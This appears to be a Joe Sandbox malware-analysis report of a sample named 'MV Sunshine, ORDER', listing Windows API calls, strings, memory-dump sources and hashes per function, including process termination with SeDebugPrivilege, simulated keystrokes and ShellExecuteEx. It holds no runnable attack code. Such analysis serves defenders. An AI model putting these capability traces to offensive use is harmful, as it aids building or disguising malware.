                      • Opcode ID: a48f3634900b98b6f5b0d25046f1c1299468b4b0fa92555fe2242cac97f9a181
                      • Instruction ID: d2199b6c412da47f36cc01222b11bd4cce88a3a7b23dac0a27fc9489f8226c26
                      • Opcode Fuzzy Hash: a48f3634900b98b6f5b0d25046f1c1299468b4b0fa92555fe2242cac97f9a181
                      • Instruction Fuzzy Hash: FB913971D0021DABDB10DFA5DC84FEEBBB8AF48710F20815AF519A7291DB319A45CFA0
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A07093
                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00A070A7
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A070C1
                      • _wcscat.LIBCMT ref: 00A0711C
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A07133
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A07161
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat
                      • String ID: SysListView32
                      • API String ID: 307300125-78025650
                      • Opcode ID: 450073bd14984a43f6f4682c48a54c16d9015bff9e2fa1a06f2c75dc13b6babb
                      • Instruction ID: 98db734a45761bdf5053a83a018f7e32db2c9a3b9c55c97c99e2d152e4900d4e
                      • Opcode Fuzzy Hash: 450073bd14984a43f6f4682c48a54c16d9015bff9e2fa1a06f2c75dc13b6babb
                      • Instruction Fuzzy Hash: 40419071A0430CAFEB21DFA4DC85BEE77A8EF48350F10052AF584A72D1D772AD858B60
                      APIs
                        • Part of subcall function 009E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 009E3EB6
                        • Part of subcall function 009E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 009E3EC4
                        • Part of subcall function 009E3E91: CloseHandle.KERNEL32(00000000), ref: 009E3F8E
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FECB8
                      • GetLastError.KERNEL32 ref: 009FECCB
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FECFA
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 009FED77
                      • GetLastError.KERNEL32(00000000), ref: 009FED82
                      • CloseHandle.KERNEL32(00000000), ref: 009FEDB7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      • Opcode ID: fbe4d5cc1fe9823fdb833d5d68b8dfb983d252915e602cc1689b55537d2d5714
                      • Instruction ID: 368c11cbc40179a19f2f2c27ced1ff036a7e6bb6579b71d65426d82a6c832a02
                      • Opcode Fuzzy Hash: fbe4d5cc1fe9823fdb833d5d68b8dfb983d252915e602cc1689b55537d2d5714
                      • Instruction Fuzzy Hash: 7D41AB712002049FDB25EF64CC95F7EB7A5AF80714F088459FA42AF3D2DB75A805CB96
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 009E32C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      • Opcode ID: 6e6236779bdbcdc372aee7c9a189bf32a332230df444877158533d253044a3a8
                      • Instruction ID: 54baa504469688cccc9af4422bc7e2e15b9f829a5c106e5d0ac03e4c05483a05
                      • Opcode Fuzzy Hash: 6e6236779bdbcdc372aee7c9a189bf32a332230df444877158533d253044a3a8
                      • Instruction Fuzzy Hash: E6115B3160C3D67AD7035A56DC46DABB39CEF19370F10842AFA5067381E6659F0045E5
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009E454E
                      • LoadStringW.USER32(00000000), ref: 009E4555
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009E456B
                      • LoadStringW.USER32(00000000), ref: 009E4572
                      • _wprintf.LIBCMT ref: 009E4598
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009E45B6
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 009E4593
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      • Opcode ID: 10191dbb0f1ba3f8e8da64266b50bd1dffb2629527198484bdbd1e872e096d90
                      • Instruction ID: 15242334add85e9e40155f2cab4461f8d33762846bbd4b424e71261a4a47d32e
                      • Opcode Fuzzy Hash: 10191dbb0f1ba3f8e8da64266b50bd1dffb2629527198484bdbd1e872e096d90
                      • Instruction Fuzzy Hash: E90162F290024CBFE721E7E0DD89EE7776CE708301F0005A5BB49E2051EA759E868B70
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • GetSystemMetrics.USER32(0000000F), ref: 00A0D78A
                      • GetSystemMetrics.USER32(0000000F), ref: 00A0D7AA
                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A0D9E5
                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A0DA03
                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A0DA24
                      • ShowWindow.USER32(00000003,00000000), ref: 00A0DA43
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00A0DA68
                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00A0DA8B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                      • String ID:
                      • API String ID: 1211466189-0
                      • Opcode ID: 61b62ced3799b557559513828d02a894da2b25ec0a650062e892b4df13665e35
                      • Instruction ID: 05d4593aa9eb002e046c8152943d3025f834fe5212701600b36011a24b517a06
                      • Opcode Fuzzy Hash: 61b62ced3799b557559513828d02a894da2b25ec0a650062e892b4df13665e35
                      • Instruction Fuzzy Hash: C3B19836600229EFDF14CFA8D9C57BE7BB1BF44741F088069EC48AB695D731A951CB90
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000), ref: 00982ACF
                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00982B17
                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000), ref: 009BC46A
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000), ref: 009BC4D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      • Opcode ID: fe6fd42a3b864da4f5544398693e973c8c13d33ac5d037e90bcfa6e2027d32bd
                      • Instruction ID: e8abed6b376d7b5c24daca0e23259243adea379daa82a892f731daab410fabff
                      • Opcode Fuzzy Hash: fe6fd42a3b864da4f5544398693e973c8c13d33ac5d037e90bcfa6e2027d32bd
                      • Instruction Fuzzy Hash: 5A412B75208680AEC73DEB68DD987BB7B9AAF86310F14881DE0579A7F0C639D842D711
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 009E737F
                        • Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
                        • Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009E73B6
                      • EnterCriticalSection.KERNEL32(?), ref: 009E73D2
                      • _memmove.LIBCMT ref: 009E7420
                      • _memmove.LIBCMT ref: 009E743D
                      • LeaveCriticalSection.KERNEL32(?), ref: 009E744C
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009E7461
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7480
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                      • String ID:
                      • API String ID: 256516436-0
                      • Opcode ID: 45f32db09a1fdeab47e1fa868ceac06c0b3ea6da52260a64e04f18bebdd92822
                      • Instruction ID: 2777e46ab833d45e9e40bce6f1db6bf98334a4ca4f7e11f5d1f1a79c71f2bf62
                      • Opcode Fuzzy Hash: 45f32db09a1fdeab47e1fa868ceac06c0b3ea6da52260a64e04f18bebdd92822
                      • Instruction Fuzzy Hash: FA31AF31904209EFCF10EFA5DC85AAEBB78EF85710F1441A5F904AB256DB709E11CBA1
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00A0645A
                      • GetDC.USER32(00000000), ref: 00A06462
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A0646D
                      • ReleaseDC.USER32(00000000,00000000), ref: 00A06479
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A064B5
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A064C6
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00A06500
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A06520
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      • Opcode ID: 17a1578fa5843aeb8fe6dd7916b778333c790cff511dd2feb930fcc95c0445be
                      • Instruction ID: 4857d78f957011823e3ed98ed0f097cd3f5833b70aa2ce998888adf172390c4c
                      • Opcode Fuzzy Hash: 17a1578fa5843aeb8fe6dd7916b778333c790cff511dd2feb930fcc95c0445be
                      • Instruction Fuzzy Hash: 01317F72201218BFEB218F50DC8AFEA3FA9EF09765F044065FE08AA191D7759C52CB74
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: 3d65cd5f20f20fab22928f28cb2ae09673e1b272382ec48f2f26fe1dd357d7a5
                      • Instruction ID: 7d367f6b4463b67e50915452e863c17c1338b8450ce8731299c5ecaee242386d
                      • Opcode Fuzzy Hash: 3d65cd5f20f20fab22928f28cb2ae09673e1b272382ec48f2f26fe1dd357d7a5
                      • Instruction Fuzzy Hash: F421A7F1685217B7DA14A921DD42FFB235CAF61394F088422FE05D6382EB56DD21C3E5
                      APIs
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                        • Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9
                      • _wcstok.LIBCMT ref: 009EEEFF
                      • _wcscpy.LIBCMT ref: 009EEF8E
                      • _memset.LIBCMT ref: 009EEFC1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                      • String ID: X
                      • API String ID: 774024439-3081909835
                      • Opcode ID: c8baf9d6e32f9894d1c96561e9cf2221f50ef27044028a253589067fd12f2753
                      • Instruction ID: 53756164ec7839e9867cd9bb57c1c55f55731e9bb5bc4b257565b76b33dcc3ce
                      • Opcode Fuzzy Hash: c8baf9d6e32f9894d1c96561e9cf2221f50ef27044028a253589067fd12f2753
                      • Instruction Fuzzy Hash: 37C157316083409FC725EF68C891B6AB7E4BF85310F14492DF8999B3A2DB70ED45CB82
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2aea4cd3cf2c6f22bbbf816218d351f8dc20f753c7024ffb1b2e4c75f78bd104
                      • Instruction ID: aed96deb0be66bc6989cfc95e1a44aa5c76a18e31bcde43c13a0c2bcb9166a4e
                      • Opcode Fuzzy Hash: 2aea4cd3cf2c6f22bbbf816218d351f8dc20f753c7024ffb1b2e4c75f78bd104
                      • Instruction Fuzzy Hash: 30716E31900109EFDB14DFA8CC89EBEBB79FF85324F148159F915AA351C774AA52CBA0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8be82bde4f36c67ebca50c72adcb1833369f18f7540e88b709c6ef4d42ce09c
                      • Instruction ID: f0f7fa738e547483ee7f8773c4076a8e28f3d868e8df03cdc867105f069e52ee
                      • Opcode Fuzzy Hash: a8be82bde4f36c67ebca50c72adcb1833369f18f7540e88b709c6ef4d42ce09c
                      • Instruction Fuzzy Hash: C261BB32108304ABC710EB64CC82F6BB7E9AFC4714F184A19F646972A2DB70AD05C7A2
                      APIs
                      • IsWindow.USER32(015B92B0), ref: 00A0B6A5
                      • IsWindowEnabled.USER32(015B92B0), ref: 00A0B6B1
                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A0B795
                      • SendMessageW.USER32(015B92B0,000000B0,?,?), ref: 00A0B7CC
                      • IsDlgButtonChecked.USER32(?,?), ref: 00A0B809
                      • GetWindowLongW.USER32(015B92B0,000000EC), ref: 00A0B82B
                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A0B843
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                      • String ID:
                      • API String ID: 4072528602-0
                      • Opcode ID: 9cc399d6c56a7eb6510e45f7efd74b67d418297e53f641890d1047d278659e3a
                      • Instruction ID: 80b0eb1d9a31074478452e046c651570f800412e7653ba1e028a6fe3fd477997
                      • Opcode Fuzzy Hash: 9cc399d6c56a7eb6510e45f7efd74b67d418297e53f641890d1047d278659e3a
                      • Instruction Fuzzy Hash: 61719338611208AFDB20DF64DAE4FAA7BB9FF89300F144069F955973E1C732A941DB61
                      APIs
                      • _memset.LIBCMT ref: 009FF75C
                      • _memset.LIBCMT ref: 009FF825
                      • ShellExecuteExW.SHELL32(?), ref: 009FF86A
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                        • Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9
                      • GetProcessId.KERNEL32(00000000), ref: 009FF8E1
                      • CloseHandle.KERNEL32(00000000), ref: 009FF910
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                      • String ID: @
                      • API String ID: 3522835683-2766056989
                      • Opcode ID: efdec1f3fbd1f53714c50798003ef2c07afdeddc3ddd90c250370975c83ff79b
                      • Instruction ID: 83764d71a92d7890c5d7fb65bd678752ed6861623010524945c1650d638011bb
                      • Opcode Fuzzy Hash: efdec1f3fbd1f53714c50798003ef2c07afdeddc3ddd90c250370975c83ff79b
                      • Instruction Fuzzy Hash: 0C619D75A00619DFCF14EF94C590AAEBBF5FF88310F148469E95AAB351CB31AD41CB90
                      APIs
                      • GetParent.USER32(?), ref: 009E149C
                      • GetKeyboardState.USER32(?), ref: 009E14B1
                      • SetKeyboardState.USER32(?), ref: 009E1512
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 009E1540
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 009E155F
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 009E15A5
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009E15C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
                      • Instruction ID: c8423ade9ae25bd5375f5f6bd68b10819324f8ab828269ca1de4afe63ffae3e2
                      • Opcode Fuzzy Hash: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
                      • Instruction Fuzzy Hash: F051F0B0A046D53EFB3782268C05BBABEAD6B46704F088489F1D6568D2D6A9AC84D750
                      APIs
                      • GetParent.USER32(00000000), ref: 009E12B5
                      • GetKeyboardState.USER32(?), ref: 009E12CA
                      • SetKeyboardState.USER32(?), ref: 009E132B
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009E1357
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009E1374
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009E13B8
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009E13D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
                      • Instruction ID: 5f18f0300d5eb951ee43e1647a3dac2b690248978a69bc22582bef1a1e96c7b5
                      • Opcode Fuzzy Hash: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
                      • Instruction Fuzzy Hash: F551E2B05046D57DFB3383268C45BBABFAD6B06300F088589E1D45ADD2E3A5EC98D760
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
